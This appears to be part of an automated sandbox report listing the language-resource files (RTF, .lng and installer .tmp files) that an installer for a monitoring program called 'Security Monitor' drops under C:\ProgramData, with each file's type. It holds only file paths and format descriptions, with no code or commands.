Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-3QHCE.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-6SQ84.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-7CL9E.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-B0JMM.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-EN318.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-FL5BQ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-FVVOE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-O8R4C.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ORGS0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-PT364.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-QIOUR.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-RS6T4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-S5VVI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-SVP0V.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-TPK2S.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-V2OM0.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-VEGMO.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0FCJK.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-7OID3.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-ADU5J.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-C0ARR.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-F6EVE.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H3CKS.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-IM23K.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-M3COJ.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-NU6LJ.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-PNRTI.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-SKTI0.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-SN766.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-10ULP.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6B6HR.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6INJ3.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-6MKTA.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7E8CR.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-7TL78.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-GCRSF.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-HJMQK.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JCAU4.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-JQGJ6.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-KDLM5.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-L8314.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-P8V34.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-QKG8H.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-R3MGE.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-RNJ6A.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-UVP7U.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2L042.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2LHUU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2QKG2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-352RA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-5T0L3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-622QE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-84AOI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-BL5AI.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-DSGC3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-IRN29.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-J0DP4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KA9DB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KBOVQ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KOKD1.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-NM0TU.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-Q51A2.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-U3SV7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0B3MR.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0L4V9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0TJQR.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-16AP3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-191EB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-34O0U.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-5PE62.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-8E5OH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-BA6OJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-EU6TD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-JH3LT.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-LR177.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NIOLM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-PURT4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-QBNGP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-REUJC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-RS5TB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TGDH1.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TH45P.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-TRDP9.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VHHT9.tmp
